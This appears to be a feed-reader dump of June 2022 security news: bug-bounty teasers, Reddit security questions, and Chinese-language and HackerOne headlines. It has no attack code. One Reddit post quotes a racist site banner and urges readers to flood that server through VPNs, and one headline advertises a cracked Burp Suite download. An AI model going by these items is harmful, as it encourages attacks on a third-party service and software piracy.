    Recently I had to create some extensions for Burpsuite. I tried finding resources that could help me but couldn’t find much. Most of them… Continue reading on Medium »
    IDOR leads to revoke access from third party user account
    Hello everyone , Continue reading on Medium »
    How I was able to delete any users’ OAUTH connections via IDOR
    ﷽ Continue reading on Medium »
    Sensitive Token Leakage from server side
    Hii all i have back with new Hacking story !!.so . One month Ago i was hunting on vdp program which is india’s one of the most successful… Continue reading on Medium »
    An Out Of Scope domain Leads To a Critical Bug[$1500]
    Hello All, I am Shakti Ranjan Mohanty (3ncryptsaan). Continue reading on Medium »
    CVE Hunting Tips #002
    Text Input Denials of Service Continue reading on The Mayor »
    SAUCERSWAP TESTNET BUG BOUNTY WITH 1,250,000 SAUCE AS REWARD
    About Sauceswap Continue reading on Medium »
  • Open

    [NSFW] Lots of beach cheeks
    submitted by /u/oDeathwingo [link] [comments]
    Radio Dramas
    https://ganahee.com/archive/Shows/ submitted by /u/c-rn [link] [comments]
    Index of /
    submitted by /u/taramj13 [link] [comments]
    Talking History - never been seen here before *apparently* & an oldie but a goodie - updated due to uhh... landing page.
    https://www.albany.edu/talkinghistory/pacifica-archives/ NO BLACKS NO INDIANS NO JEWS LIBERAL SUBNET BANS APPLIED CHINA AND RUSSIA WELCOME VISIT VIA: http://109.120.203.163/web/blyad.club/Music/ EDIT: Can I suggest we all use Chinese and Russian vpns to hammer the living shit out of blyad.club. submitted by /u/ringofyre [link] [comments]
  • Open

    CyberTalents — Airport
    Ok so OSINT was not my strong suit. Continue reading on Medium »
    War in Ukraine / June 23
    Ukraine retreats from Severodonetsk Continue reading on Medium »
  • Open

    Best thing to learn for SOC Analyst?
    Hey guys I am looking to get my Security+ by the end of the summer and finish my Cyber security related diploma in College by the end of the year. Any recommendations on which SIEM I should learn? What is most common? I was thinking ELK, Splunk, or QRadar? submitted by /u/kingkarmaxii [link] [comments]
    Signing into Windows 10 with a School account on a new User
    So I'm just starting Uni and I have been given a Microsoft 365 account from them. If I sign in as a new user on my PC with the school account, what data do they have access to? I have a D drive on my PC with family photos, receipts, tax info etc that I don't really want my school having access to. Are they able to see other drives on my device? or do they only see what's in OneDrive and what I do on edge while signed into my school's 365 account in the browser? Thanks! submitted by /u/Dazr87 [link] [comments]
  • Open

    Analyzing a macro enabled office file.
    Hi! So if you’re using Microsoft Office and you been around for quite a while. You probably heard about Macros? Continue reading on Medium »
    Red Team and Blue Team Training
    Modern malware actors get into the companies’ networks and steal any sensitive data they need. One of the effective ways to keep the… Continue reading on Medium »
  • Open

    Netsec Goggle for Brave Search
    submitted by /u/alxjsn [link] [comments]
    Hagana - A novel approach to runtime protection for NodeJS to prevent supply chain attacks
    submitted by /u/beckerman_jacob [link] [comments]
    Playing Docker? Bad Containers and What They Teach Us
    submitted by /u/Illustrious_Yard_576 [link] [comments]
    The curious tale of a fake Carrier.app
    submitted by /u/lormayna [link] [comments]
    CookieMonsteRCE: Stored XSS to RCE in Zena
    submitted by /u/jibblz [link] [comments]
    The Far Point of a Static Encounter
    submitted by /u/amirshk [link] [comments]
  • Open

    Looking for recommendations to include in a presentation for people starting out in DFIR
    What are some important things to discuss for people who may or may not be looking to have a career in DFIR? I'm mainly going to be talking about my career progression in DFIR (how I got into it, how I got into my current position, etc) but I want to make the majority of the presentation helpful and about the audience. How can I make it entertaining, engaging and knowledgeable? I don't want to make it too technical, as majority of the audience will be non-technical. Any help is appreciated! submitted by /u/haloman882 [link] [comments]
    Cellebrite vs. Oxygen
    Hi all I would like to ask what experiences you have had with both tools and where you see the advantages and disadvantages of the two solutions. As far as I know, cellebrite's strengths lie mainly in its support for older devices. I also find the tool a bit more user-friendly. I also noticed that with Oxygen it is not possible to hide all the data that you are no longer allowed to have in an OFBR backup. What are the other strengths and weaknesses of the tools mentioned? Many thanks for your help :) submitted by /u/B-Boy_DG_ [link] [comments]
    add NSRL hashset to EnCase Forensics V8.05
    Hi Forensicators, Pretty much what the title says, I am trying to add latest RDS minimal NSRL hashset to the EnCase Forensic v8.05. The hashset I downloaded from NIST website is a zip file which upon extraction are a bunch of text files. But I think EnCase is looking for a different format and throws an error that HashRoot.bin is not available. Can someone help me the link to download the latest NSRL hashset in the EnCase format or some other way to add this hashset. Thanks. submitted by /u/AcalTheNerd [link] [comments]
  • Open

    SecWiki News 2022-06-24 Review
    安全团队的演进及个人定位思考 by ourren 网络空间战场环境测绘初探 by ourren 复盘卫星大战 Hack-A-Sat 2 天基攻防竞赛 by ourren 复盘卫星大战 Hack-A-Sat 1 天基攻防竞赛 by ourren 更多最新文章,请访问SecWiki
  • Open

    SecWiki News 2022-06-24 Review
    安全团队的演进及个人定位思考 by ourren 网络空间战场环境测绘初探 by ourren 复盘卫星大战 Hack-A-Sat 2 天基攻防竞赛 by ourren 复盘卫星大战 Hack-A-Sat 1 天基攻防竞赛 by ourren 更多最新文章,请访问SecWiki
  • Open

    静态代码分析之C语言篇
    从本篇起,笔者将开启c语言代码安全分析篇章,为大家详细剖析c语言静态代码分析的各种技术细节。
    FreeBuf早报 | 知网已被网络安全审查;攻击者利用Log4Shell入侵VMware服务器
    2022年6月23日,网络安全审查办公室约谈同方知网(北京)技术有限公司负责人,宣布对知网启动网络安全审查。
    Cunning Kitten–针对中东相关人士的威胁组织
    Cunning Kitten的攻击目标聚焦于世界各地的使用波斯语的相关人士,选取相关人士关心的政治话题发起攻击。
    QNAP发出警告,关键PHP漏洞可导致远程代码执行
    QNAP 正在解决一个关键的PHP 漏洞,该漏洞可能被用来实现远程代码执行。
    LambdaGuard:一款针对AWS无服务器环境安全的审计工具
    AWS Lambda是由Amazon Web Services提供的事件驱动的无服务器计算平台。
    NSO终于承认!至少5个欧洲国家正使用飞马间谍软件
    饱受争议的以色列监控软件供应商NSO Group向欧盟立法者承认,欧洲地区至少有五个国家使用了该公司的飞马(Pegasus)间谍软件。
    CISA:威胁行为者利用Log4Shell漏洞入侵VMware服务器
    近期,CISA表示,包括国家支持的黑客组织在内的威胁行为者仍在使用 Log4Shell (CVE-2021-44228) 远程代码执行漏洞针对 VMware Horizo​​n和统一访问网关 (UAG) 服务器。攻击者可以远程利用暴露于本地或Internet访问的脆弱服务器上的Log4Shell,在网络上横向移动,直到获得访问包含敏感数据的内部系统的权限。在2021年12月披露后,多个威胁参与者开
    FreeBuf周报 | 美当局称已捣毁僵尸网络RSOCKS;Facebook面临集体诉讼
    各位 FreeBufer 周末好~以下是本周的「FreeBuf周报」,我们总结推荐了本周的热点资讯、优质文章和省心工具,保证大家不错过本周的每一个重点!
    2022年漏洞扫描工具TOP 10
    十大漏洞扫描工具盘点
    史上最能卷的勒索组织之一,每天工作时间超14小时
    连勒索组织都已经这么卷了,安全行业的压力有多大可想而知,只能被迫跟着卷起来。
  • Open

    There Is More Than One Way to Sleep: Dive Deep Into the Implementations of API Hammering by Various Malware Families
    Learn about the unique implementations of API Hammering malware samples and how to mitigate them. The post There Is More Than One Way to Sleep: Dive Deep Into the Implementations of API Hammering by Various Malware Families appeared first on Unit 42.
  • Open

    WordPress WP HTML Mail plugin Vulnerable to XSS
    The XSS vulnerability in the WordPress WP HTML Mail plugin for personalized emails makes it vulnerable to code injection and phishing… Continue reading on Medium »

  • Open

    Chrome 104 Beta: New Media Query Syntax, Region Capture, and More
    Unless otherwise noted, changes described below apply to the newest Chrome beta channel release for Android, Chrome OS, Linux, macOS, and Windows. Learn more about the features listed here through the provided links or from the list on ChromeStatus.com. Chrome 104 is beta as of June 23, 2022. You can download the latest on Google.com for desktop or on Google Play Store on Android. Region Capture Chrome on Desktop can now crop self-captured video tracks. Web apps are already able to capture video in a tab using getDisplayMedia(). Region capture allows web apps to crop a track and remove content from it, typically before sharing it remotely. For example, consider a productivity web app with built-in video conferencing. During a video conference, a web app could use cropping to exclude th…
  • Open

    Burpsuite Pro crack Download in kali Linux
    Hello Friends Continue reading on Medium »
    Find SSRF , LFI , XSS using httpx , waybackurls , gf , gau , qsreplace
    Hello Beautiful hackers Continue reading on Medium »
    Intigriti — XSS Challenge — May 2022 — Bug Bounty Hunting — Writeup
    Hello guys I am back again. So let’s start talking rn bc I’m tired of everything. Continue reading on Medium »
    Intigriti — XSS Challenge — April 2022 — Bug Bounty Hunting — Writeup
    Hello guys I am back again. So let’s start talking rn bc this writeup will be long. Continue reading on Medium »
    Intigriti — XSS Challenge — March 2022 — Bug Bounty Hunting — Writeup
    Hello guys I am back again. This challenge was pretty interesting and one of my fav. Let’s start talking instead of wasting our time. Continue reading on Medium »
    Intigriti — XSS Challenge — February 2022 — Bug Bounty Hunting — Writeup
    Hello guys I am back. This challenge was awesome btw. So let’s start talking. Continue reading on Medium »
    Intigriti — XSS Challenge — January 2022 — Bug Bounty Hunting — Writeup
    Hello guys I am back. I was bored so I decided to post some Intigriti’s writeups until new XSS challenge comes now at June 20. So let’s… Continue reading on Medium »
    NahamCon CTF 2022 — Web Exploitation — All Challenges — Writeup
    Hello my name is rootjkqsta. I am Bug Bounty Hunter, Web App Pentester, Security Researcher and CTF player. So I was thinking why not to… Continue reading on Medium »
    Recon — All In One, Fast, Easy Recon Tool (HydraRecon)
    HydraRecon tool is an automated tool developed in the Python language which performs the task of Information Gathering and Crawling the… Continue reading on Medium »
  • Open

    DC Firewall segmentation alternatives
    Hello, We currently do not have any DC firewall at our healthcare facility. We cater for around 4000 users. It is a single site and there are remote vpn vendors connecting to support medical equipment. All vlans are behind the core switches. Now segmentation is one area we want to address, but not sure with plugging in a DC firewall is still the goto solution, as it can cause impact, be a SPOF. There are many other offerings claiming to do this , like NAC vendors, endpoint firewall agents , etc. I have been hearing positive things about Cisco tetration as well. Appreciate your inputs about segmentation paths experience other than internal/dc firewalling submitted by /u/MoeShea [link] [comments]
    Cheap and efficient way to host WP website in many different countries
    So for my undergraduate degree I'm developing a honeypot WordPress website and I want to host this website in different countries to see if the attacks differ depending on geographical differences. Now I can go ahead and buy a package from ex. Kinsta for 5 different websites and pay 150$ for that, but before I do that do you guys recommend any other more clever and more cost efficient idea to solve my issue. submitted by /u/krullmizter [link] [comments]
  • Open

    Information Leak: Posted, Discovered & Misused! How easy for Criminals to get your data?
    No content preview
    Why is the Zero Trust Security Model Effective?
    No content preview
  • Open

    Information Leak: Posted, Discovered & Misused! How easy for Criminals to get your data?
    No content preview
    Why is the Zero Trust Security Model Effective?
    No content preview
  • Open

    Information Leak: Posted, Discovered & Misused! How easy for Criminals to get your data?
    No content preview
    Why is the Zero Trust Security Model Effective?
    No content preview
  • Open

    Ukraine War —  Geolocation #1
    On 08/03/2022, Twitter user @tinso_ww tweeted the following video consisting of two video clips taken from a UAV in Ukraine. Continue reading on Medium »
    War in Ukraine / June 22
    The Ukrainian agricultural sector estimates losses of $23 billion. This will also hurt world food prices Continue reading on Medium »
    OCTOSUITE — Advanced GitHub OSINT Framework
    OCTOSUITE é uma ferramenta que permite de forma prática extrair diversos dados de um perfil público do GitHub. Continue reading on 100security »
    OSINTEYE — PyPI, GitHub, Instagram e DockerHub
    OSINTEYE é uma ferramenta que permite de forma prática extrair diversos dados de um perfil público das plataformas PyPI, GitHub, Instagram… Continue reading on 100security »
    A short glossary of 12 Cybersecurity Techniques
    A short list of some cybersecurity techniques, both computer and human. Continue reading on Medium »
    Історія інтернету і перших пошукових систем
    Як, коли і ким був створений інтернет? Історія ARPANET. Про перші комп’ютерні мережі, FTP-сервери, веб-сканери, краулери і пошуковики. Continue reading on KR. LABORATORIES IT BLOG »
  • Open

    Fuzzing rust-minidump for Embarrassment and Crashes – Part 2
    Article URL: https://hacks.mozilla.org/2022/06/fuzzing-rust-minidump-for-embarrassment-and-crashes/ Comments URL: https://news.ycombinator.com/item?id=31852480 Points: 103 # Comments: 2
  • Open

    Any DFIR-Orc user who could help with KAPE embedding?
    Hello, I’m an intern in a company’s forensics lab. My job is to setup a DFIR-Orc (artifact collector from ANSSI), to replace the Velociraptor collector we currently use. Atm I’m having issues trying to embed Kape inside of Orc. I’m able to run KAPE from DFIR-Orc, but Kape isn’t able to find the .tkape files so it doesn’t collect anything of course. Did anyone know or already used DFIR-Orc here that would be willing to help? Thanks. Edit : I’ve tried to find ressources online, but nobody seems to have ever done this before, so I’m trying my luck here submitted by /u/Aigle13 [link] [comments]
  • Open

    This repo contains information about EDRs that can be useful during red team exercise.
    submitted by /u/M_Reza_Bakhtiyari [link] [comments]
    Miracle - One Vulnerability To Rule Them All
    submitted by /u/scopedsecurity [link] [comments]
    fuzzuli is a fuzzing tool that aims to find critical backup files by creating a dynamic wordlist based on the domain.
    submitted by /u/0xmusana [link] [comments]
    Understanding the Compound File Binary Format and OLE Structures to Mess with CVE-2022-30190
    submitted by /u/canmaplap [link] [comments]
  • Open

    SecWiki News 2022-06-23 Review
    今日暂未更新资讯~ 更多最新文章,请访问SecWiki
  • Open

    SecWiki News 2022-06-23 Review
    今日暂未更新资讯~ 更多最新文章,请访问SecWiki
  • Open

    如何使用SMBSessionSpoofer伪造SMB会话
    SMBSessionSpoofer是一款针对SMB会话的安全工具,可以帮助广大研究人员轻松创建出一个伪造的SMB会话。
    云主机AKSK泄露利用
    云主机通过使用Access Key Id / Secret Access Key加密的方法来验证某个请求的发送者身份。
    FreeBuf早报 | 西北工业大学遭境外网络攻击;Conti勒索软件一个月内攻击40多个组织
    Lyceum 组织以针对中东能源和电信领域而闻名,并且主要依赖基于.NET 的恶意软件。
    如何使用Blackbird通过用户名来进行社交网站OSINT
    关于BlackbirdBlackbird是一款功能强大的公开资源情报收集工具,该工具可以帮助广大研究人员通过目标用户的用户名来快速搜索多达119个社交媒体网站,并收集相关账户的信息。Blackbird支持发送异步HTTP请求,因此可以大幅度提升运行效率和工具性能。功能特性1、本地Web服务器2、按用户名搜索3、元数据提取4、JSON数据读取和存储5、报告生成6、效率高速度快支持的社交媒体网站当前版
    立陶宛对俄罗斯“禁运”后遭网络攻击
    近日,新兴黑客组织“网络特种部队”(Cyber Spetsnaz) 或已将矛头对准了立陶宛的政府资源和关键基础设施。
    MEGA修复了允许解密用户数据的关键漏洞
    MEGA 发布了一个安全更新,以解决一系列可能会暴露用户数据的严重漏洞。
    《关于构建数据基础制度更好发挥数据要素作用的意见》审议通过
    数据基础制度建设事关国家发展和安全大局,要维护国家数据安全,保护个人信息和商业秘密,加快构建数据基础制度体系。
    基于ObRegisterCallbacks实现的进程保护功能
    本文将简单讲下如何使用ObRegisterCallbacks,实现进程保护功能。
    微软:俄罗斯将加强对乌克兰盟友的网络攻击
    俄罗斯情报机构已加强对乌克兰联盟国家政府的网络攻击。
    游戏安全丨喊话CALL分析-分析参数
    视频制作不易,求三联支持,拜谢~添加公众账号“极安御信安全研究院”,报暗号:“资料” 即可领取视频相关工具、源码、学习资料,和其他逆向工程免费课。进交流群报暗号“交流群”
    网安新势力创始人们,投资人和行业评委Pick谁?
    开启网安新宇宙,快来为您支持的创始人打Call!
    假如三国有网络安全攻防演练
    战争的本质是人与人之间的对抗,某种程度来说,网络攻防其实就是发生在虚拟世界中的战争。
  • Open

    Tails 5.1.1 is out – fixes high severity CVE-2021-38385
    Article URL: https://tails.boum.org/news/version_5.1.1/index.en.html Comments URL: https://news.ycombinator.com/item?id=31847510 Points: 2 # Comments: 0

  • Open

    Bypass for Domain-level redirects (Unvalidated Redirects and Forwar)
    GitLab disclosed a bug submitted by thypon: https://hackerone.com/reports/1582160
    Able to approve admin approval and change effective status without adding payment details .
    Reddit disclosed a bug submitted by bisesh: https://hackerone.com/reports/1543159 - Bounty: $5000
  • Open

    Recieved scam email and the "From" field was my email
    Hi. How attacker spoofed my email address? The email didn't pass the SPF and DMARC, but still I got the message. I got this email: https://www.brendinghat.com/2022/06/20/there-is-an-overdue-payment-under-your-name-please-settle-your-debts-asap/ submitted by /u/athanielx [link] [comments]
    Phone stolen, thief somehow got my banking into. Im confused as to how, help.
    So June 11th, I go out to a bar in downtown Montréal, my phone gets stolen, only my phone I still have my cards and all. I change my passcodes to everything that night, except my bank. I can’t Bcs I need the verification code they’d send to my phone. I have 2 factor authentication so the thief's would theoretically need my debit card number, my password, and the pin that gets sent to my phone to get into my mobile banking. Somehow today I get a “ pre authorized debit DOB” that pop up on my account for 999$, this type of transfer requires the thief to have my account number and the transit number, which are only in the mobile banking app. Now my question is, how would someone get the info off my mobile bank. ( oh also, I deactivated my SIM card the next morning after the theft, and through find my phone the minute the phone touches wifi it wipes all the contents) just confused as to how this possibly could have happened. submitted by /u/Working-Plantain8273 [link] [comments]
    Azure firewall log analysis tool
    What do you all use in the way of log analysis tools to monitor and dashboard out your firewall data as it pertains to the various managed resources w/in your environments that are externally facing? submitted by /u/Dalgan [link] [comments]
    Best Sandbox Solution(s)?
    Hello all. In a government subcontractor environment, I get asked a couple times a month, "This file is suspicious, can you open it in a sandbox for me?" But I am not sure what I can use to do this. I know Microsoft Office has a sandboxing capability but not sure how I make sure my file is opened in sandbox. It is quite finicky. Are there any other applications that can be used instead? What sandbox application/ solution are you using? T.I.A. submitted by /u/NoMomNotTheBelt14 [link] [comments]
  • Open

    Dos and Windows 3.x Software
    submitted by /u/ilikemacsalot [link] [comments]
  • Open

    Bug Bounty Tips #001
    Unverified Password Change Continue reading on The Mayor »
    Bug Bounty Tips #001
    Finding Projects Continue reading on The Mayor »
    $1500 Of Broken Access Controls
    Hello, Continue reading on Medium »
    Critical Git Repository Leaked Internal Data
    Description: Continue reading on Medium »
    2 GREAT TOOLS FOR PENTESTER
    Hi guys! I’m back with a new blog, this will be short but I think it’s great because I’ll show you two tools that are for me now basic for… Continue reading on Medium »
  • Open

    War in Ukraine / June 21
    Belarus continues to be a problem for Ukraine Continue reading on Medium »
    Proper Development Update of gotEM and Recent Events
    Hello community! Continue reading on Medium »
  • Open

    SecWiki News 2022-06-22 Review
    ysuserial:Java 反序列化漏洞利用工具 by ourren 当 XM 12 遇到 eBPF by ourren 2022车联网数据安全监管研究报告 by ourren 电信网络诈骗黑灰产生态概览:基础设施 by ourren MITRE 供应链安全可信系统技术框架(SoT™) by ourren 测量哈萨克斯坦对 HTTPS 的大规模拦截 by Avenger 更多最新文章,请访问SecWiki
  • Open

    SecWiki News 2022-06-22 Review
    ysuserial:Java 反序列化漏洞利用工具 by ourren 当 XM 12 遇到 eBPF by ourren 2022车联网数据安全监管研究报告 by ourren 电信网络诈骗黑灰产生态概览:基础设施 by ourren MITRE 供应链安全可信系统技术框架(SoT™) by ourren 测量哈萨克斯坦对 HTTPS 的大规模拦截 by Avenger 更多最新文章,请访问SecWiki
  • Open

    Improvements for Go fuzzing in version 1.19
    Article URL: https://www.code-intelligence.com/blog/fuzzing-golang-1.19 Comments URL: https://news.ycombinator.com/item?id=31835857 Points: 6 # Comments: 1
  • Open

    FreeBuf早报 | 一个开源代码项目平均有49个漏洞;亚马逊启动AWS量子网络中心
    欧洲刑警组织6月21日宣布解散一个涉足网络钓鱼、诈骗和洗钱活动的犯罪集团。
    工控安全遭严峻挑战,56个严重漏洞席卷OT 设备
    安全研究人员在10家OT供应商的产品中发现56个严重的安全漏洞,Forescout将这56期报告统称为“OT:ICEFALL”。
    如何实现与FDA保持邮件通信安全加密?
    本文关于如何实现与FDA保持邮件通信安全加密。
    Cloudflare服务中断致数百个网站瘫痪
    美国东部时间6月21日,网络基础设施服务提供商Cloudflare发生了一起故障,导致数百个网站大面积中断。
    新的DFSCoerce NTLM中继攻击允许攻击者控制Windows域
    安全专家发现了一种名为 DFSCoerce 的新型 Windows NTLM 中继攻击,它允许攻击者控制 Windows 域。
    警方捣毁造成数百万美元损失的网络钓鱼团伙
    在欧洲刑警组织协调的执法行动后,造成数百万欧元损失的网络钓鱼团伙成员被逮捕。
    CVE-2020-1472
    CVE-2020-1472是一个Windows域控中严重的远程权限提升漏洞。
  • Open

    Semgrep rules for PHP security assessment
    submitted by /u/0xdea [link] [comments]
    ShoMon V2: Shodan Monitoring Integration for TheHive written in Golang
    submitted by /u/KaanSK [link] [comments]
  • Open

    简单聊下最近2个有意思的漏洞
    作者:heige@知道创宇404实验室 原文链接:https://mp.weixin.qq.com/s/-fHeQe-00ay7z5JXvvdK1w CVE-2022-22620 前几天p0的blog更新一篇文章《An Autopsy on a Zombie In-the-Wild 0-day》 针对2022年2月份披露的一个在野漏洞CVE-2022-22620 “考古” 过程,还是比较有意...
  • Open

    简单聊下最近2个有意思的漏洞
    作者:heige@知道创宇404实验室 原文链接:https://mp.weixin.qq.com/s/-fHeQe-00ay7z5JXvvdK1w CVE-2022-22620 前几天p0的blog更新一篇文章《An Autopsy on a Zombie In-the-Wild 0-day》 针对2022年2月份披露的一个在野漏洞CVE-2022-22620 “考古” 过程,还是比较有意...

  • Open

    Weak rate limit for SIGN.PLUS email verification
    Alohi disclosed a bug submitted by zeesozee: https://hackerone.com/reports/1584569
  • Open

    Do you know any good awareness blogs about malware and endpoint protection?
    Hello! Do you know any good awareness blogs/video/article about malware and endpoint protection? It should be to a user who is not familiar with cyber security. I found a lot of cool information about anti-phishing, but I need something more that focus on malware infection. submitted by /u/athanielx [link] [comments]
    SIEM Tools - AlienVault, possibly moving to Microsoft Sentinel
    Hi All, I've worked in AlienVault USM for 3 years now and do not love the SIEM feature or really anything about it. The company may be able to get Sentinel at a pretty fair price. Does anyone have experience with Sentinel or both tools? Or other recommendations for a "small" company with few security analysts. Healthcare Company size: 1,500 people Security Team: Very small, 2 people Thanks, submitted by /u/compguyguy [link] [comments]
    Pentesting DNS?
    I was assigned to do a “DNS pentest”. That’s what they call but I have no idea where to start with or what do I need to ask the Network team. Do I need some credentials or anything? Appreciate all the answers. submitted by /u/Puzzleheaded-Try5749 [link] [comments]
    Securing a private database
    I’m interested in understanding the common ways people secure their internal database for access by, for example, developers. Example one, for an on-premise database do you just use a vpn and local database users? Or do you connect the database to some sort of single sign on where possible? How would you audit this? Example two, For a private database in a public cloud how do you control connectivity? Do you use a vpn for that too or a bastion host or just security group settings (for AWS for example)? For both these examples, how would you scale tracking and managing users, credentials and authz (who’s allowed to do what) at scale? Thanks for any feedback. submitted by /u/cewdesign [link] [comments]
  • Open

    $1,500 XSS — what to consider during the bug bounty
    Hello folks, long time no see! I recently got my bounty from one of private programs on HackerOne and wanted to talked about it, share my… Continue reading on Medium »
    IDOR vulnerability
    1- What’s the IDOR? Continue reading on Medium »
    Telangana, Andhra Pradesh, Karnataka, Himachal Pradesh & Kerala — All Government bus services were…
    Hi Hackers! Welcome back to my new write-up. My name is Krishnadev P Melevila. I am a 20-Year-old Self-Learned Ethical Hacker. Continue reading on InfoSec Write-ups »
    I Found IDOR In Private Program Via API
    WHOAMI: Continue reading on Medium »
    Java Application -Server Side Template Injection
    Description: Continue reading on Medium »
  • Open

    War in Ukraine / June 20
    👉 Laws passed by the Verkhovna Rada of Ukraine during the 110 days of the war Continue reading on Medium »
  • Open

    Improving AI-based defenses to disrupt human-operated ransomware
    submitted by /u/SCI_Rusher [link] [comments]
  • Open

    Improving AI-based defenses to disrupt human-operated ransomware
    submitted by /u/SCI_Rusher [link] [comments]
    Container escapes: Detecting abuses of Linux capabilities with Falco + Intro to CAP_SYS_ADMIN
    submitted by /u/capitangolo [link] [comments]
    A deep dive into Sigma rules and how to write your own threat detection rules
    submitted by /u/sciencestudent99 [link] [comments]
    Reverse Engineering an old Mario & Luigi game for fun
    submitted by /u/CyberMasterV [link] [comments]
    Intercepting MS Teams Communication
    submitted by /u/OwnPreparation3424 [link] [comments]
    When the CAS let you in - abusing misconfigured Actuator in Apereo CAS
    submitted by /u/qwerty0x41 [link] [comments]
    Does Acrobat Reader Unload Injection of Security Products?
    submitted by /u/woja111 [link] [comments]
  • Open

    SecWiki News 2022-06-21 Review
    今日暂未更新资讯~ 更多最新文章,请访问SecWiki
  • Open

    SecWiki News 2022-06-21 Review
    今日暂未更新资讯~ 更多最新文章,请访问SecWiki
  • Open

    Infosec Weekly #2 — Docker, Google Dorks, Bug Bounty and other interesting Infosec stuff.
    No content preview
    What are supply chains and how to secure them
    What are Supply Chains Attacks Continue reading on InfoSec Write-ups »
    Telangana, Andhra Pradesh, Karnataka, Himachal Pradesh & Kerala — All Government bus services were…
    No content preview
    HacktheBox Writeup: Paper
    No content preview
    Kubernetes Security Policy Enforcement — OPA
    No content preview
    Google Dorks: An Advanced Hacking Tool
    No content preview
    Create a Hidden IRC Server with The Onion Router (TOR)
    No content preview
  • Open

    Infosec Weekly #2 — Docker, Google Dorks, Bug Bounty and other interesting Infosec stuff.
    No content preview
    What are supply chains and how to secure them
    What are Supply Chains Attacks Continue reading on InfoSec Write-ups »
    Telangana, Andhra Pradesh, Karnataka, Himachal Pradesh & Kerala — All Government bus services were…
    No content preview
    HacktheBox Writeup: Paper
    No content preview
    Kubernetes Security Policy Enforcement — OPA
    No content preview
    Google Dorks: An Advanced Hacking Tool
    No content preview
    Create a Hidden IRC Server with The Onion Router (TOR)
    No content preview
  • Open

    Infosec Weekly #2 — Docker, Google Dorks, Bug Bounty and other interesting Infosec stuff.
    No content preview
    What are supply chains and how to secure them
    What are Supply Chains Attacks Continue reading on InfoSec Write-ups »
    Telangana, Andhra Pradesh, Karnataka, Himachal Pradesh & Kerala — All Government bus services were…
    No content preview
    HacktheBox Writeup: Paper
    No content preview
    Kubernetes Security Policy Enforcement — OPA
    No content preview
    Google Dorks: An Advanced Hacking Tool
    No content preview
    Create a Hidden IRC Server with The Onion Router (TOR)
    No content preview
  • Open

    记一次实战攻防(打点-Edr-内网-横向-Vcenter)
    前不久参加了一场攻防演练,过程既简单也曲折,最后通过横向渗透获取到了vcenter管理控制台权限,成功拿下本次演练目标。
    顺德农商银行2021年金融科技人才社会招聘全面启动~~
    诚邀您共同书写顺德农商银行的数字未来!!
    FreeBuf早报 | 亚马逊前员工因数据泄露被定罪;谷歌浏览器扩展可用于在线跟踪用户
    亚马逊前员工因数据泄露被定罪。
    可怕!美国旗星银行150万客户数据遭泄露
    旗星银行(Flagstar Bank)150多万名客户在去年12月的一次网络攻击中,个人数据遭到了黑客的访问。
    可怕!!美国旗星银行150万客户数据遭泄露
    旗星银行(Flagstar Bank)150多万名客户在去年12月的一次网络攻击中,个人数据遭到了黑客的访问。
    微软紧急发布更新,修复ARM设备上的Microsoft365登录问题
    近期Microsoft发布了一个带外(OOB)Windows更新。
    APT 28组织成员被指控入侵北约智库
    一名黑客被指控对位于德国的北约智库联合空中力量能力中心进行了网络间谍攻击。
  • Open

    The complete bitdl.ir List
    http://s1.bitdl.ir/ - Works http://s2.bitdl.ir/ - Works http://s3.bitdl.ir/ - Works http://s4.bitdl.ir/ - Offline http://s5.bitdl.ir/ - Offline http://s6.bitdl.ir/ - 403 Error http://s7.bitdl.ir/ - Offline http://s8.bitdl.ir/ - 403 Error http://s9.bitdl.ir/ - Works http://s10.bitdl.ir/ - Works http://s11.bitdl.ir/ - Offline http://s12.bitdl.ir/ - Offline http://s13.bitdl.ir/ - Works http://s14.bitdl.ir/ - Works http://s15.bitdl.ir/ - Offline http://s16.bitdl.ir/ - DNS Resolution Error http://s17.bitdl.ir/ - Offline http://s18.bitdl.ir/ - Offline http://s19.bitdl.ir/ - 403 Error http://s20.bitdl.ir/ - Offline http://s21.bitdl.ir/ - Offline http://s22.bitdl.ir/ - Offline http://s23.bitdl.ir/ - Offline http://s24.bitdl.ir/ - Offline http://s25.bitdl.ir/ - Offline http://s26.bitdl.ir/ - Offline http://s27.bitdl.ir/ - 403 Error http://s28.bitdl.ir/ - Works http://s29.bitdl.ir/ - Offline http://s30.bitdl.ir/ - 403 Error http://s31.bitdl.ir/ - Offline http://s32.bitdl.ir/ - 403 Error http://s33.bitdl.ir/ - Offline submitted by /u/ilikemacsalot [link] [comments]
  • Open

    Find out formated or marged partitions
    Hello all, I have a laptop ssd drive with windows, I took the drive created E01 file, decrypt it from bittlocker encryption and i want to know the history of the partitions, I tried to use volume shadow copies but they all very recent, how can I tell if the partitions changed somehow? thanks in advance. submitted by /u/tzichntzch [link] [comments]
    Convert Parallels image
    Hey Guys maybe someone of you can help me. Im investigating an image of an older MacBook. There is an Win10 Parallels-VM inside. Is it possible to extract an image of this VM? In best case direct as .e01? I don't have a Mac by myselve so i can't use parallels to convert the VM. The only way I discovered some evidence is by carving.. submitted by /u/kaibring [link] [comments]
    $8k tower budget
    Company recently gave me a 15k budget, 8k specific to a new PC. Does anyone have any recents forensic tower builds for under 8k used to process cell dumps and run analytics or custom build companies you recommend? Found a Dell Precision 7910 xeon e5 2698 v4 2.2 ghz, 20 core, 512 GB ddr4 that's under 6k but not excited about xeon. Looking for options and new accessories to build out the 15k. submitted by /u/WhoAteTheLastCookie [link] [comments]
  • Open

    What is Fuzzing? Why it is Important on Cybersecurity?
    What is Fuzzing? Why it is Important on Cybersecurity? Continue reading on Medium »
  • Open

    What is Fuzzing? Why it is Important on Cybersecurity?
    What is Fuzzing? Why it is Important on Cybersecurity? Continue reading on Medium »
  • Open

    CVE-2022-1040 Sophos Firewall 服务架构与认证绕过漏洞分析之旅
    作者:且听安全 原文链接:https://mp.weixin.qq.com/s/c0X8Ct2I2SP-H_pioMM12Q 漏洞信息 前端时间 Sophos Firewall 爆出了一个认证绕过漏洞 CVE-2022-1040 ,最近在深入分析 Sophos 服务架构的同时,完整复现了该漏洞。主要是在 User Portal 及 Webadmin 两个接口存在认证绕过漏洞,漏洞巧妙利用了...
    CVE-2022-27925 Zimbra Collaboration 存在路径穿越漏洞最终导致RCE
    作者:且听安全 原文链接:https://mp.weixin.qq.com/s/2pUW4H1v6mnXtMqTlxZCMA 漏洞信息 前段时间 Zimbra 官方通报了一个 RCE 漏洞 CVE-2022-27925 ,也有小伙伴在漏洞空间站谈到了这个漏洞,上周末在家有时间完成了漏洞的分析与复现。漏洞原理并不复杂,但在搭建环境的过程中遇到了一些坑,下面将分析过程分享给大家。 从描述来看,...
